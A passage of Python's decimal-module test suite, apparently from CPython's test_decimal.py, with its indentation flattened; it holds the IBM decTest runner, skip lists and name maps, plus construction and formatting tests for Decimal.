# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
